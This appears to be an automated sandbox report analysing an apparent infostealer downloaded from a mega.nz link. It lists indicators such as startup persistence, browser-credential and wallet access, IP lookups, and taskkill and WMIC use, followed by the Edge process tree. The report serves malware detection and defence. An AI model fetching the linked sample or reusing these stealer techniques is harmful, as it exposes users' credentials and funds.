Analysis
-
max time kernel
216s -
max time network
218s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
10-06-2024 14:33
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s
Resource
win10v2004-20240426-en
Behavioral task
behavioral2
Sample
https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s
Resource
android-x64-20240603-en
Behavioral task
behavioral3
Sample
https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s
Resource
macos-20240410-en
General
-
Target
https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepowershell.exepid process 5704 powershell.exe 3756 powershell.exe 4696 powershell.exe -
Drops startup file 1 IoCs
Processes:
runtime.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\runtime.exe runtime.exe -
Executes dropped EXE 7 IoCs
Processes:
HMC.exeexpections.exeexpections.exeruntime.exeerrorlog.exeruntime.exerar.exepid process 1512 HMC.exe 4580 expections.exe 4804 expections.exe 1900 runtime.exe 5076 errorlog.exe 3124 runtime.exe 5696 rar.exe -
Loads dropped DLL 61 IoCs
Processes:
expections.exeruntime.exeerrorlog.exepid process 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 4804 expections.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 3124 runtime.exe 5076 errorlog.exe 5076 errorlog.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI45802\python311.dll upx behavioral1/memory/4804-504-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\_queue.pyd upx behavioral1/memory/4804-556-0x00007FFA7E130000-0x00007FFA7E13F000-memory.dmp upx behavioral1/memory/4804-555-0x00007FFA79980000-0x00007FFA799A4000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\select.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\libcrypto-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\libffi-8.dll upx behavioral1/memory/4804-584-0x00007FFA68970000-0x00007FFA68AE3000-memory.dmp upx behavioral1/memory/4804-587-0x00007FFA685B0000-0x00007FFA685DE000-memory.dmp upx behavioral1/memory/4804-593-0x00007FFA7DB20000-0x00007FFA7DB2D000-memory.dmp upx behavioral1/memory/4804-592-0x00007FFA68930000-0x00007FFA68944000-memory.dmp upx behavioral1/memory/4804-591-0x00007FFA684F0000-0x00007FFA685A8000-memory.dmp upx behavioral1/memory/4804-590-0x00007FFA63D80000-0x00007FFA640F5000-memory.dmp upx behavioral1/memory/4804-586-0x00007FFA7E110000-0x00007FFA7E11D000-memory.dmp upx behavioral1/memory/4804-585-0x00007FFA68950000-0x00007FFA68969000-memory.dmp upx behavioral1/memory/4804-577-0x00007FFA78190000-0x00007FFA781B3000-memory.dmp upx behavioral1/memory/4804-575-0x00007FFA78C10000-0x00007FFA78C29000-memory.dmp upx behavioral1/memory/4804-574-0x00007FFA79010000-0x00007FFA7903D000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI45802\_ctypes.pyd upx behavioral1/memory/4804-639-0x00007FFA62B50000-0x00007FFA62C6C000-memory.dmp upx behavioral1/memory/4804-846-0x00007FFA684F0000-0x00007FFA685A8000-memory.dmp upx behavioral1/memory/4804-845-0x00007FFA63D80000-0x00007FFA640F5000-memory.dmp upx behavioral1/memory/4804-844-0x00007FFA685B0000-0x00007FFA685DE000-memory.dmp upx behavioral1/memory/4804-833-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmp upx behavioral1/memory/4804-836-0x00007FFA79980000-0x00007FFA799A4000-memory.dmp upx behavioral1/memory/4804-1015-0x00007FFA68970000-0x00007FFA68AE3000-memory.dmp upx behavioral1/memory/4804-1009-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmp upx behavioral1/memory/4804-1010-0x00007FFA79980000-0x00007FFA799A4000-memory.dmp upx behavioral1/memory/4804-1069-0x00007FFA7E130000-0x00007FFA7E13F000-memory.dmp upx behavioral1/memory/4804-1081-0x00007FFA62B50000-0x00007FFA62C6C000-memory.dmp upx behavioral1/memory/4804-1080-0x00007FFA7DB20000-0x00007FFA7DB2D000-memory.dmp upx behavioral1/memory/4804-1079-0x00007FFA68930000-0x00007FFA68944000-memory.dmp upx behavioral1/memory/4804-1077-0x00007FFA63D80000-0x00007FFA640F5000-memory.dmp upx behavioral1/memory/4804-1076-0x00007FFA685B0000-0x00007FFA685DE000-memory.dmp upx behavioral1/memory/4804-1075-0x00007FFA7E110000-0x00007FFA7E11D000-memory.dmp upx behavioral1/memory/4804-1074-0x00007FFA68950000-0x00007FFA68969000-memory.dmp upx behavioral1/memory/4804-1073-0x00007FFA68970000-0x00007FFA68AE3000-memory.dmp upx behavioral1/memory/4804-1072-0x00007FFA78190000-0x00007FFA781B3000-memory.dmp upx behavioral1/memory/4804-1071-0x00007FFA78C10000-0x00007FFA78C29000-memory.dmp upx behavioral1/memory/4804-1070-0x00007FFA79010000-0x00007FFA7903D000-memory.dmp upx behavioral1/memory/4804-1068-0x00007FFA79980000-0x00007FFA799A4000-memory.dmp upx behavioral1/memory/4804-1067-0x00007FFA661D0000-0x00007FFA667B8000-memory.dmp upx behavioral1/memory/4804-1078-0x00007FFA684F0000-0x00007FFA685A8000-memory.dmp upx -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 106 api.ipify.org 118 ip-api.com 123 api.ipify.org -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\Downloads\HMC 2.2.1\x64\runtime.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 4 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exeWMIC.exepid process 5484 WMIC.exe 2824 WMIC.exe 808 WMIC.exe 1728 WMIC.exe -
Enumerates processes with tasklist 1 TTPs 5 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 2632 tasklist.exe 5628 tasklist.exe 5532 tasklist.exe 1396 tasklist.exe 3196 tasklist.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
msedge.exemsedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 12 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5724 taskkill.exe 5736 taskkill.exe 2284 taskkill.exe 5040 taskkill.exe 5584 taskkill.exe 6096 taskkill.exe 5264 taskkill.exe 4120 taskkill.exe 920 taskkill.exe 4824 taskkill.exe 6044 taskkill.exe 3272 taskkill.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3571316656-3665257725-2415531812-1000\{16D0BE5F-2751-4D9C-8F9D-D2487CB45285} msedge.exe -
Suspicious behavior: EnumeratesProcesses 54 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exemsedge.exemsedge.exeidentity_helper.exepid process 2344 msedge.exe 2344 msedge.exe 3664 msedge.exe 3664 msedge.exe 4792 identity_helper.exe 4792 identity_helper.exe 3932 msedge.exe 3932 msedge.exe 4928 powershell.exe 4928 powershell.exe 4696 powershell.exe 4696 powershell.exe 3756 powershell.exe 3756 powershell.exe 5524 powershell.exe 5524 powershell.exe 5704 powershell.exe 5704 powershell.exe 4696 powershell.exe 4696 powershell.exe 4928 powershell.exe 4928 powershell.exe 5524 powershell.exe 3756 powershell.exe 5704 powershell.exe 5140 msedge.exe 5140 msedge.exe 5584 powershell.exe 5584 powershell.exe 5584 powershell.exe 5872 powershell.exe 5872 powershell.exe 5872 powershell.exe 1368 powershell.exe 1368 powershell.exe 1368 powershell.exe 1584 powershell.exe 1584 powershell.exe 1584 powershell.exe 5964 powershell.exe 5964 powershell.exe 5964 powershell.exe 2928 powershell.exe 2928 powershell.exe 5748 powershell.exe 5748 powershell.exe 4468 powershell.exe 4468 powershell.exe 4388 msedge.exe 4388 msedge.exe 4168 msedge.exe 4168 msedge.exe 5260 identity_helper.exe 5260 identity_helper.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 28 IoCs
Processes:
msedge.exemsedge.exepid process 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
7zG.exetasklist.exetasklist.exepowershell.exepowershell.exepowershell.exeWMIC.exetasklist.exepowershell.exepowershell.exeWMIC.exedescription pid process Token: SeRestorePrivilege 2236 7zG.exe Token: 35 2236 7zG.exe Token: SeSecurityPrivilege 2236 7zG.exe Token: SeSecurityPrivilege 2236 7zG.exe Token: SeDebugPrivilege 2632 tasklist.exe Token: SeDebugPrivilege 3196 tasklist.exe Token: SeDebugPrivilege 4928 powershell.exe Token: SeDebugPrivilege 4696 powershell.exe Token: SeDebugPrivilege 3756 powershell.exe Token: SeIncreaseQuotaPrivilege 5420 WMIC.exe Token: SeSecurityPrivilege 5420 WMIC.exe Token: SeTakeOwnershipPrivilege 5420 WMIC.exe Token: SeLoadDriverPrivilege 5420 WMIC.exe Token: SeSystemProfilePrivilege 5420 WMIC.exe Token: SeSystemtimePrivilege 5420 WMIC.exe Token: SeProfSingleProcessPrivilege 5420 WMIC.exe Token: SeIncBasePriorityPrivilege 5420 WMIC.exe Token: SeCreatePagefilePrivilege 5420 WMIC.exe Token: SeBackupPrivilege 5420 WMIC.exe Token: SeRestorePrivilege 5420 WMIC.exe Token: SeShutdownPrivilege 5420 WMIC.exe Token: SeDebugPrivilege 5420 WMIC.exe Token: SeSystemEnvironmentPrivilege 5420 WMIC.exe Token: SeRemoteShutdownPrivilege 5420 WMIC.exe Token: SeUndockPrivilege 5420 WMIC.exe Token: SeManageVolumePrivilege 5420 WMIC.exe Token: 33 5420 WMIC.exe Token: 34 5420 WMIC.exe Token: 35 5420 WMIC.exe Token: 36 5420 WMIC.exe Token: SeDebugPrivilege 5628 tasklist.exe Token: SeIncreaseQuotaPrivilege 5420 WMIC.exe Token: SeSecurityPrivilege 5420 WMIC.exe Token: SeTakeOwnershipPrivilege 5420 WMIC.exe Token: SeLoadDriverPrivilege 5420 WMIC.exe Token: SeSystemProfilePrivilege 5420 WMIC.exe Token: SeSystemtimePrivilege 5420 WMIC.exe Token: SeProfSingleProcessPrivilege 5420 WMIC.exe Token: SeIncBasePriorityPrivilege 5420 WMIC.exe Token: SeCreatePagefilePrivilege 5420 WMIC.exe Token: SeBackupPrivilege 5420 WMIC.exe Token: SeRestorePrivilege 5420 WMIC.exe Token: SeShutdownPrivilege 5420 WMIC.exe Token: SeDebugPrivilege 5420 WMIC.exe Token: SeSystemEnvironmentPrivilege 5420 WMIC.exe Token: SeRemoteShutdownPrivilege 5420 WMIC.exe Token: SeUndockPrivilege 5420 WMIC.exe Token: SeManageVolumePrivilege 5420 WMIC.exe Token: 33 5420 WMIC.exe Token: 34 5420 WMIC.exe Token: 35 5420 WMIC.exe Token: 36 5420 WMIC.exe Token: SeDebugPrivilege 5524 powershell.exe Token: SeDebugPrivilege 5704 powershell.exe Token: SeIncreaseQuotaPrivilege 5740 WMIC.exe Token: SeSecurityPrivilege 5740 WMIC.exe Token: SeTakeOwnershipPrivilege 5740 WMIC.exe Token: SeLoadDriverPrivilege 5740 WMIC.exe Token: SeSystemProfilePrivilege 5740 WMIC.exe Token: SeSystemtimePrivilege 5740 WMIC.exe Token: SeProfSingleProcessPrivilege 5740 WMIC.exe Token: SeIncBasePriorityPrivilege 5740 WMIC.exe Token: SeCreatePagefilePrivilege 5740 WMIC.exe Token: SeBackupPrivilege 5740 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exe7zG.exepid process 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 2236 7zG.exe -
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
msedge.exemsedge.exepid process 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 3664 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe 4168 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 3664 wrote to memory of 2256 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 2256 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 1184 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 2344 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 2344 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe PID 3664 wrote to memory of 4268 3664 msedge.exe msedge.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/nrg2AYYC#1PvUlWNQ9oOv3bpF6zh_beBoyXZuEP_ePiM-37oLS_s1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3664 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa797e46f8,0x7ffa797e4708,0x7ffa797e47182⤵PID:2256
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:22⤵PID:1184
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2544 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:2344 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:82⤵PID:4268
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:12⤵PID:684
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:12⤵PID:3148
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:82⤵PID:1812
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5600 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4792 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5272 /prefetch:12⤵PID:2280
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:12⤵PID:3772
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5336 /prefetch:12⤵PID:2860
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:12⤵PID:1956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:12⤵PID:3560
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,4719924055829174791,7614484860962290019,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4732 /prefetch:12⤵PID:2872
-
